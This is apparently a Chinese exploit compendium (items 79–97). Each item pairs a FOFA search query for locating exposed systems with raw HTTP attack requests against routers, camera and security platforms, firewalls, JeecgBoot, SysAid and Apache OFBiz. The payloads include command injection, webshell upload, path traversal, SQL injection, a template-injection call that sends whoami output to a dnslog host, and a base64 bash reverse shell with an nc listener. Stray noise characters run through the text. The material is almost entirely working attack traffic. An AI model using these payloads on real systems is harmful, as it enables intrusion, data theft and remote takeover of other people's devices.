+ s4 R- C* ^0 `# n, E+ T# |8 n( FContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"7 e' N6 l9 b2 h" x
Content-Type: image/png: S  b5 F8 D/ P5 c0 E3 D

9 h5 _- N( P! W$ r6 W/ q: ?% vYsOxWxSvj1KyZow1PTsh98fdu6l& v8 A& ]- I3 K, r8 [
------YsOxWxSvj1KyZow1PTsh98fdu6l
, [4 r( v; K$ @6 `/ l# l. [$ lContent-Disposition: form-data; name="target"
% O1 O/ M* [# a9 V2 u$ I" b8 U1 N. Y6 ^$ k! K( j
/Applications/SkillDevelopAndEHS/6 o7 p; t& R1 J( Q$ \
------YsOxWxSvj1KyZow1PTsh98fdu6l--7 }( v, A% I: V0 O' U
+ U- H( D+ m) J6 n4 b, a

, P* H1 v8 N9 s+ T; v8 }) NGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
9 b9 Q+ b( j& I* WHost: x.x.x.x  Z7 l  r6 ^4 q+ K4 i& L" J8 A; r

. @! h1 H) d5 `' [5 n
0 N' X- I" O% p9 z3 m9 [79. BYTEVALUE 百为流控路由器远程命令执行5 U5 K' Q; M  R) [2 u( _
FOFA：BYTEVALUE 智能流控路由器; I: a& W7 j9 Y6 i' T- q* t
GET /goform/webRead/open/?path=|id HTTP/1.1
! k6 R% l! G0 H& T/ @Host:IP2 t' h- P1 H2 N9 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* R" [* ^$ {6 |0 q' F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' K( ]& P4 o( G8 u7 P! z8 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 `& Y, a# l# }! c6 a& nAccept-Encoding: gzip, deflate
- W; u6 w; M, L9 I/ i) H# E; e) ~1 AConnection: close
. D3 k( O" o6 o5 s0 I& q; @Upgrade-Insecure-Requests: 17 ~+ x3 A1 ^. F& N
* P, R8 h& k6 ?; ]9 b  U

2 l# i' T3 J+ k, Z' b. n80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 g  o; d9 B$ W' x
FOFA：app="速达软件-公司产品": E4 {' [9 r/ j4 C  `$ e* I
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 j8 Y4 a* Z: P1 ]% t3 aHost: x.x.x.x  |" }' M. Q" ~: |" K0 V7 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 `9 R+ ?) z" p6 I; ]$ M" i$ bContent-Length: 27
4 J# l  [: T# r1 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ W4 Y+ s5 H0 O( e" ]1 U4 g7 [Accept-Encoding: gzip, deflate
3 ^9 I" t- m0 @2 o) u5 `. g# HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) R$ b/ U& H# ]/ A, @6 ?- @( ~Connection: close) B. ?/ z7 ^$ v* O! g
Content-Type: application/octet-stream
+ {. z# u* P4 P! C- i8 `7 XUpgrade-Insecure-Requests: 18 ?7 a! _+ _% r, m

1 y1 S5 l5 e5 m7 ~7 ~7 j5 w<% out.print("oessqeonylzaf");%>& R1 H/ Z! ~* E
9 j: m* e9 t; {8 X
+ I% c! E/ q9 k# c, h
GET /xykqmfxpoas.jsp HTTP/1.1
4 G" @+ j+ O( F4 q" ]7 H# u; `7 u% nHost: x.x.x.x
' R9 o+ o7 z2 q7 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( b' N) T: z- N1 ^7 KConnection: close
6 j$ h; l: ^& |7 ~7 S+ m4 IAccept-Encoding: gzip
8 O5 ^  L4 f$ D! d' n3 _6 j! p! N* v) J( Y
' B1 H2 [% W) ]- x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 I& D8 d6 w! U- ^( uFOFA：app="uniview-视频监控"
. r% s0 v$ Y( m: `' `2 i3 q- nGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
& f) J& }8 }5 p2 D6 uHost: x.x.x.x9 |* U3 Z, q4 e# R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 m2 t; ?0 d1 x) |
Connection: close
( z  S1 W5 d( s# cAccept-Encoding: gzip) B2 y/ X! B/ r. `- o3 U

* h. d0 W" l4 E4 l) A0 V- A  O4 G1 U
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
: i/ Z9 G7 L1 q3 f, E8 F* @FOFA：app="思福迪-LOGBASE"
& K1 s" X) M! g1 q9 f$ ePOST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL+ v% `0 T# o, F1 D: B* `
User-Agent: Go-http-client/1.1
2 i5 h; {" r1 [, C% f5 ~Content-Length: 23
) P% ]& e( w- R& U0 }Accept-Encoding: gzip+ d6 @* B" r6 m- U' L. w/ F7 G
Connection: close% F/ `  o3 J/ M% t6 k) A8 w, n
Content-Type: application/x-www-form-urlencoded: D- s3 Z9 z; ]( ~5 \
Referer: BaseURL8 j  G3 \% ^" J/ g- N
# `( O- p0 i" j9 H/ H
z1=1&z2="|id;"&z3=bhost( n$ m; o3 u% U$ {/ I6 K" D1 X: t% \$ h

. b$ {7 j" J6 Q9 ^6 k  h
3 ?" k9 V1 a7 T; X83. JeecgBoot testConnection 远程命令执行
. B* t; p9 f! g6 j' VFOFA：title=="JeecgBoot 企业级低代码平台": j+ V7 \% K4 [

0 L  Y3 G' c8 C1 X# g: R3 M4 T. ?2 F. G3 z$ D" [+ ]8 N- I3 B
POST /jmreport/testConnection HTTP/1.1
7 ]% f6 m1 k% d* P  n% ZHost: x.x.x.x/ l& D! I- M0 |( C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( a# p, |! s4 K, h  |& W" J, P
Connection: close
  X4 g# v3 F0 V% I/ ^2 c2 VContent-Length: 8881
. A8 z" Y2 j0 `% W1 @Accept-Encoding: gzip, _& b! P/ u. L  o2 @: Q* V
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO", x# \& R, q) b7 d8 S( s+ T  o
Content-Type: application/json
  L9 }8 B. V7 E% c$ w
3 s( ]" i/ W, u. ^3 a3 zPAYLOAD
4 _3 b9 D( |7 c) [) }( s! t9 ~
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入& [5 F3 p0 I/ s" X; C: f: L
FOFA：title=="JeecgBoot 企业级低代码平台"
! S* T; }0 V; y5 @$ c  `
4 k1 M4 B' y. I, A0 V# k6 [
. _# ]( h; v- P3 ]- e: M
9 P* d1 H+ k9 t' [7 Z! ?1 A, |POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1+ {  O$ p5 |0 c6 _: M& q. J% _3 @0 v
Host: 192.168.40.130:80805 U2 }# u5 w$ z9 V8 k- ]* G9 a
User-Agent: curl/7.88.1+ I  K+ J! z  ~4 _, b+ ]
Content-Length: 156' z9 w4 T7 u4 b
Accept: */*
0 C! d& V) S" j! }) v# i& pConnection: close
2 O' I- G& }3 vContent-Type: application/json
) m6 o! r% J9 i7 ^  a0 \Accept-Encoding: gzip
" [: J: X2 L5 D
+ h0 S* U% ~" [0 c{
4 \; _1 Y- ?0 a- a "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
7 [- x7 g& F# s! t3 Z: |' {9 T9 M  "type": "0"- G- v6 q# k) I$ c! e1 v
}
8 L* i$ u; ?6 s! M+ D) R4 O$ V$ E( U% |9 [+ o+ @7 V- k8 [, J

: ]( J3 H# {8 [. I: Q5 |85. SysAid On-premise< 23.3.36远程代码执行! e, B+ A4 E6 s0 S
CVE-2023-47246) X( v+ ]8 t6 t+ L4 g
FOFA：body="sysaid-logo-dark-green.png"
! z( v: ]7 L0 s0 PEXP数据包如下，注入哥斯拉马  B' m3 P; X6 d" D+ t( L/ U
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1$ {! P( Q) o* ]' g: G
Host: x.x.x.x
% q% q5 x0 t: U; ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ N/ R% a( |, j* i9 Q. \
Content-Type: application/octet-stream/ B; ~: b0 E0 `1 Z
Accept-Encoding: gzip, L- d% u# @; r5 J
& W) T# B# _, }2 M' a4 \
PAYLOAD
3 A  J; X/ {" b' M( ?4 \5 B% ?- C( D: U
回显URL：http://x.x.x.x/userfiles/index.jsp
7 V3 J" v$ m& I1 D& @
# h8 T  W0 m/ l( a$ O86. 日本tosei自助洗衣机RCE' x0 `) f5 O) o- v5 h5 r
FOFA：body="tosei_login_check.php"
: j. D7 J% D6 I. t( b8 pPOST /cgi-bin/network_test.php HTTP/1.1
: i6 B0 ^2 C1 }) I  gHost: x.x.x.x
0 o7 z7 W. t0 J8 N1 x4 MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# r6 b, J, t% d0 V+ H
Connection: close
7 [7 z+ ^$ H& ?2 vContent-Length: 44# m! {+ z3 p" W$ k
Accept: */*1 e; w0 z4 K) t: B# K$ ]# s
Accept-Encoding: gzip% d9 k1 c- A5 X4 E6 a
Accept-Language: en
  J5 Z' S9 a! ]Content-Type: application/x-www-form-urlencoded$ {3 g1 Q5 b5 Y$ j
- j+ T8 {, [* Z; F5 Q
host=%0acat${IFS}/etc/passwd%0a&command=ping
7 k/ J4 o  o; H% c( h6 A3 \# X1 _2 A3 q/ X

- \& U5 K# m& y87. 安恒明御安全网关aaa_local_web_preview文件上传
) k& H- X1 z, ^, t9 p  ?3 iFOFA：title="明御安全网关"
( W; Z. A3 c% W* |, XPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
9 J# |: q; e' w$ H  P6 T0 b$ rHost: X.X.X.X
, p5 U4 @- X2 y: M' T6 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- C5 ?3 }' O- u9 C2 H) x0 B. c
Connection: close$ j+ c. u' s% y8 o* v# r
Content-Length: 198
$ `% ~' o+ L$ l5 [. _5 CAccept-Encoding: gzip
9 \( n' }2 c: G( P+ D0 pContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
; d, J1 ?0 R1 w- n  d3 ^$ x3 W0 c0 e. ?: h1 z
--qqobiandqgawlxodfiisporjwravxtvd
6 b6 E; U; ?8 U) D& `Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"  ?8 t9 r# p3 b+ s* O4 }4 x! C$ D# M
Content-Type: text/plain
  w% l& d( }3 n$ v6 ?, y9 M- i5 q( J6 `- ?7 W0 y7 l: L7 w
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
* g! y! N; j8 N4 A6 G: \' s--qqobiandqgawlxodfiisporjwravxtvd--
! W& r2 V# `7 i; |5 K
2 s  D2 j) o6 S+ B  ]6 g
* q$ g3 \2 P2 j) ]) h) H/jfhatuwe.php
3 r4 C0 `# [4 U4 `0 t3 b7 {
  s4 v: ]1 r  i4 S8 i9 J$ J' g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
/ R6 c5 U. n5 LFOFA：title="明御安全网关"
+ M7 k! G0 F* J' m, K9 tGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.12 C1 R5 J  d# e' K$ d) S7 m
Host: x.x.x.xx.x.x.x8 J9 q& k& R3 e9 ]+ Z# d8 ^3 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ z' n. C" x- f+ X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 g9 m+ G) c  ^! x* S. p
Accept-Encoding: gzip, deflate
" _) a- a) Q, s9 a3 B) r! CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, {" z) h* W+ ^- i  r5 fConnection: close
: x5 K: F6 _( _/ v$ p* F) Y/ j
4 w2 }, j, |* W, l
* K& t1 A4 P  @6 H/ r) ?* l9 f/astdfkhl.php0 Q( q9 G  |% G7 H
& {  A" X( B! L; M
89. 致远互联FE协作办公平台editflow_manager存在sql注入/ D2 q4 {& x# [. o$ S( Z
FOFA：title="FE协作办公平台" || body="li_plugins_download"
2 |5 N& {) d4 o- `' zPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
9 C3 @6 Y; C. F9 Z. h. [Host: x.x.x.x. q# T9 n# s: Z4 D: Y+ D' G! U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) s) v/ J7 M. D( e. Z3 @' L
Connection: close
5 E/ a% ~6 p/ O" s3 c: P7 OContent-Length: 41
! z- g) I- d/ eContent-Type: application/x-www-form-urlencoded
% ^6 _$ K( v  tAccept-Encoding: gzip
$ Y% ~( Y0 u. N6 q6 L4 I# P6 b' _+ J
option=2&GUID=-1'+union+select+111*222--+
) Q2 {6 D1 i! i. f/ m  g) J
; `/ J$ Z  F' g2 X( f" W6 ^$ l5 \. |! j, M& D4 X
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行" s4 w, y0 x7 e) x2 Z3 `, m
FOFA：icon_hash="-1830859634"
$ r& w2 V6 m: S: sPOST /php/ping.php HTTP/1.1% k1 k, H& _! t. m, k1 R: n
Host: x.x.x.x
& |7 @# v+ ]5 n6 Q+ `) O# YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
0 H" L3 ^' U8 v$ ]Content-Length: 51
: z- R. [& e  o& p/ k6 {- BAccept: application/json, text/javascript, */*; q=0.01
( q2 u, B  n" @% R( h3 T( @5 [Accept-Encoding: gzip, deflate
- A- ~( Y" J+ T( nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" V1 N+ c. s& S3 `  y  FConnection: close
) W$ ^8 r: Z2 b( l* a1 D# Q' ]Content-Type: application/x-www-form-urlencoded/ S" V. `% R# q# Z. m. M4 c, |
X-Requested-With: XMLHttpRequest2 q( ^9 q& `6 r5 t' T
) p% H+ {) @& }
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig) V/ y, H/ q5 L4 O  F

# @( P6 d+ m/ \8 r: K9 p/ G( E2 t; W; c0 p9 Q* m! k9 u7 e
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
& s3 n2 @4 W. c& a# m8 _+ VFOFA：title="综合安防管理平台"
# ^+ ?0 R5 M; `5 i4 hGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' F  ?4 K" A4 k
Host: your-ip0 f& p, S: q; T8 o/ l8 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
9 u& [2 u& V8 |% N5 O" \Accept-Encoding: gzip, deflate
: r( I* o( H7 }) t1 NAccept: */*0 g7 h$ @5 ?; Q. Z. o
Connection: keep-alive( c7 G- H; R) O7 `

6 X" a5 ^9 o( K5 [% p3 \
$ a( ~( P1 {. x% x  H& y6 K- y3 e
+ A1 r; Z6 p( g8 _92. 海康威视运行管理中心session命令执行
; S7 `( Z5 u: j3 uFastjson命令执行. e5 |2 E  W' m  g% F0 o
hunter：web.icon=="e05b47d5ce11d2f4182a964255870b76"( p" n$ r$ M6 I! i  q2 P
POST /center/api/session HTTP/1.1* o( z$ Q, b7 l/ O2 ]+ m
Host:
' x- [- [4 G$ |0 o4 A1 bAccept: application/json, text/plain, */*# j+ a! Z" x; L+ I
Accept-Encoding: gzip, deflate' j1 q3 l; o  V  I
X-Requested-With: XMLHttpRequest
$ f/ h6 c0 q& zContent-Type: application/json;charset=UTF-8
0 A) w" i# Z2 U% l6 @$ @X-Language-Type: zh_CN( q! _' u( e2 l& c2 u
Testcmd: echo test
, P+ J' W4 Y' o5 p/ }! S8 e- FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36! }3 a  l$ r2 v
Accept-Language: zh-CN,zh;q=0.9+ F( _& `3 i6 M. j1 H  \0 B3 S
Content-Length: 5778
' F, q% e1 E. k9 t
: `- Y3 w6 D. ]4 ^& g, vPAYLOAD
, Y' Y# _1 Y. n  C  _: i$ w. V' I) E/ k0 \5 }: x: c

- `7 ?' e1 \# F3 i  `9 x& S, H& e93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 K2 K" S9 ]( l* Z" W, T, k
FOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="6 f& R; H2 N. R3 Q3 h
POST /?g=app_av_import_save HTTP/1.15 Q7 X4 g* W! Z6 B- j" E- U
Host: x.x.x.x
+ t/ i! n; A' W* q/ w" b6 gContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
0 |, ]6 y: N" Z# eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 P+ o0 {) a0 F6 Z
8 |0 e, ~% W- r) A! M- t( c& j  D------WebKitFormBoundarykcbkgdfx
' v$ W, i, @$ c0 vContent-Disposition: form-data; name="MAX_FILE_SIZE"
* q+ l& x3 F' x3 _/ H
, I$ J( w5 p  {( m10000000. O0 t! {. }1 n" A0 D: @  ]' ]" Q
------WebKitFormBoundarykcbkgdfx8 @8 p# k0 d$ e# |" U
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
* y( s* m, p+ H9 i+ v0 GContent-Type: text/plain
6 Y& n0 N) o" t! ^1 b% U! @
- n0 n- }+ h" z; X% U4 Jwagletqrkwrddkthtulxsqrphulnknxa
4 m5 W1 n& x; B/ L------WebKitFormBoundarykcbkgdfx% ~3 q! \2 ^. h( g' X4 ?
Content-Disposition: form-data; name="submit_post"
- }  X& F; {6 N+ t5 E# Q1 A+ S4 f! N8 j5 B! F+ j: ]
obj_app_upfile
6 v6 e- Y2 N! e9 d1 d0 I4 v3 W/ `------WebKitFormBoundarykcbkgdfx
5 |: H/ T/ u3 u5 ]" E/ MContent-Disposition: form-data; name="__hash__"
6 Q3 n8 S4 ~0 S. v
  p; u* z. l4 ?) @* P6 l+ b& `0b9d6b1ab7479ab69d9f71b05e0e94450 x' h1 ?8 W2 w0 O$ C. j
------WebKitFormBoundarykcbkgdfx--4 ~/ L) i( s, P2 u

6 v+ |& @- |1 C+ Z. [7 H+ `) ~2 \9 {# I) i
GET /attachements/xlskxknxa.txt HTTP/1.1
% ~5 o$ }" l) FHost: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 ?# b. W4 z$ ]) _) {; x9 H+ m2 e% \3 o0 g1 J6 l0 U
: ?' K' ^9 P. A# D. u' k
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传7 E: @7 D. l( V3 Z* \. e' N
FOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="
8 N. i' o4 g. O9 v3 k" }9 VPOST /?g=obj_area_import_save HTTP/1.15 I+ \2 }8 m+ K+ b0 _0 [# E- c
Host: x.x.x.x$ D* K( n2 {8 e* m6 \6 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; g: a* N9 O2 r& B4 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) R, e# n9 ~$ }* _: H! ^5 S
' F0 j$ z8 n. @6 g------WebKitFormBoundarybqvzqvmt( T) @! ~8 j9 q0 ]/ r# `
Content-Disposition: form-data; name="MAX_FILE_SIZE"9 }6 ]+ C! }+ B/ l4 U# X: w/ {% K
) \5 `* y  h0 s
10000000  j7 Z/ M9 }- z; l+ _) X, a# @/ i
------WebKitFormBoundarybqvzqvmt" r. R/ t$ I& I4 Q6 P& @* W5 F
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ i: a$ h1 f4 g- e# N0 H6 NContent-Type: text/plain
+ J! X2 m; [/ N- b1 d. V' N* S3 B6 v$ q8 z
pxplitttsrjnyoafavcajwkvhxindhmu
# A/ V9 x/ M! n2 i( ~------WebKitFormBoundarybqvzqvmt6 u4 N- |3 z# ?: D
Content-Disposition: form-data; name="submit_post". q4 H& V# |7 E) j# ?
' T3 w5 V3 i- r# t3 @
obj_app_upfile3 R' {* i$ N$ e9 q( d5 M8 P
------WebKitFormBoundarybqvzqvmt8 L! c2 L; n1 q8 p7 x
Content-Disposition: form-data; name="__hash__"
  ]* L) K6 l0 G- q9 e! c" X
$ N: e; f2 @3 \& k5 h, k0b9d6b1ab7479ab69d9f71b05e0e94458 t/ e3 u: G0 s' j& `  B& m
------WebKitFormBoundarybqvzqvmt--3 G; s! h8 w% @
3 p9 d8 R6 o; y- H! {+ A
- d. d/ x5 F$ ^

( L9 V. d/ i' {GET /attachements/xlskxknxa.txt HTTP/1.1
- J" h( U6 A" R* LHost: xx.xx.xx.xx; B6 F% n/ j4 K) V7 l: f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 z3 o! t2 B9 ~4 F

9 K0 v8 \9 D3 D4 w% w# j, u! \, x; H# q. u$ a
% P& c, M8 ~7 \! e/ Q9 m" B
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行2 T6 s* A5 }$ m  L
CVE-2023-49070
! l, H  U2 {0 ]/ e: b8 v1 mFOFA：app="Apache_OFBiz": X/ d  J& @; }% f
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1# x. b: k9 {5 h: a6 f$ I
Host: x.x.x.x1 T; A0 c( o7 z9 Z$ J/ _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
- Z; m5 H$ P0 O, q. FConnection: close
8 Q" s* \8 E* ^8 P& L& yContent-Length: 889% K) n% Q! n2 `
Content-Type: application/xml4 r4 L) s/ q% D
Accept-Encoding: gzip
; p/ w' C' K' O$ G7 W7 t! `: m+ y" B7 F* i
<?xml version="1.0"?>; E0 v) C0 z: m# S% U
<methodCall>
3 e; S3 o& e" T/ d+ r, i) b% g* b <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
- {; z1 l/ K/ b! S4 s+ W0 c6 h <params>
7 t3 |) n" }! G* R" I! M8 A% Y- m    <param>$ k; q2 ^6 x( _" `$ n2 }
   <value>
( Z" w. \2 {6 z9 A0 ~# s* ^       <struct>- s) m; C7 q* b$ w1 Y
   <member>
; B0 D- i) R% F3 U" I9 U       <name>test</name>
( I7 f5 y. I# s( r: x" S# ?       <value>$ ]4 _8 L% |3 O
   <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
* v) K6 Q8 `+ q) A       </value>
! ~, }/ U! j6 u7 ~7 P       </member>- h! F0 a  _( m- q2 l& N6 M  p3 g
   </struct>6 I1 W) T4 {, V3 m# K- S
   </value>
5 \* C: ~  Y2 s( I6 p7 E) Z, p4 G- t </param>/ J0 U. @% b6 e; Z+ f+ h
</params>
& {* C! _+ ?9 u/ M</methodCall>
* J0 ^0 F+ `! G  ]4 x2 @
+ H! z5 ?* R9 L; B0 F
: Q5 x9 J0 {& d9 f) Q1 |) \' b& O用ysoserial生成payload( f; g/ J  F5 P& I
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"1 d, z+ x* j! `* D$ I1 _
  Y' p  C9 P3 Z9 {3 m
1 T- j" y+ i$ K/ }) W& o
将生成的payload替换到上面的POC) J4 _$ }  \+ b+ m8 A$ M$ A
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
# U$ @+ ^+ u/ j; XHost: 192.168.40.130:8443
8 c7 }& d1 }8 c* L8 F$ m$ [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# P; t& J3 t4 M1 @; ]; N0 T. n
Connection: close
& M6 ^& H2 B( \- F+ d0 i1 V$ uContent-Length: 8890 z1 ~* O" t* Q9 O6 a6 j
Content-Type: application/xml* n# @. t' E9 e% m5 {
Accept-Encoding: gzip
) W& X' X* v( A7 m  f5 j; b- N' E8 d+ S$ y% Y
PAYLOAD
7 ^# d* v: I8 o$ I: E8 S2 o0 c! H! Y2 N8 B
96. Apache OFBiz  18.12.11 groovy 远程代码执行3 c5 _2 W# R4 ]& H
FOFA：app="Apache_OFBiz"* f/ [: t$ |$ R  u- N# a$ L( g' q1 [
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- D$ j( h8 Z: S. h- I& p6 j2 dHost: localhost:8443( k9 u* ]0 J% o" d9 Q( m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( H2 t* P) R: x+ r5 MAccept: */*
( }) q7 ?) [6 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ D* O0 ?. F, T: x& F; CContent-Type: application/x-www-form-urlencoded6 E$ i# ]9 B+ n4 l, u' F2 v
Content-Length: 55
: J# g( i! R5 ?( I7 O4 x$ L
  z1 ^7 K! I( dgroovyProgram=throw+new+Exception('id'.execute().text);
* G# C2 V9 e  N; k8 t5 [
( W% L% C) _3 q) s. T" e: y; S% I) J" W5 j1 E+ F9 Y8 |
反弹shell) J# u+ N# \. ~
在kali上启动一个监听
! r- X, C1 P: J$ Nnc -lvp 77773 ]. h% N; e- @9 O5 g% @

! {! C9 m, E% U$ y. ]: l" O( hPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1: t4 K6 `( y8 ?, O% @& F* t
Host: 192.168.40.130:8443
4 Q5 v  ~* F) U' s: OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- I0 t2 e( J# q. E8 g9 w: J0 v/ ^" LAccept: */*& `5 _5 y  [+ c- L( t( U3 S( x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; t8 t& g/ q1 l2 e0 a' iContent-Type: application/x-www-form-urlencoded
: t7 x2 P& d# Z( h4 q5 C" NContent-Length: 713 y& d  Z( ^9 J. E# d& ?4 v  I* \

. q  m% E5 ?- i0 w5 a6 A& QgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 e6 W6 p6 F+ u- x5 E8 @8 C, _7 |
# @1 q0 i' s9 s97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ k) H0 k- f% @5 e- Q' E
FOFA：body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
, w9 ~# s/ r* w' p) l8 nGET /passport/login/ HTTP/1.1
) E2 g( |& P3 [3 F  c1 m9 P" ]Host: 192.168.40.130:80856 o9 A& g9 j# y4 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 O6 U* \* N5 r- B' e% b
Accept-Encoding: gzip% B: _, N# q5 s0 C* H$ F& G4 G% [
Connection: close1 Y- j9 J, ^% A* S% s! ^9 P
Cookie: rememberMe=PAYLOAD7 Q4 L$ }, q9 l$ y, ]" k6 e$ m
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"1 V' }$ x6 ]! L6 m1 l

4 D& G$ V# Q' V- c/ V9 i& n8 U- P7 v, O% U. ~
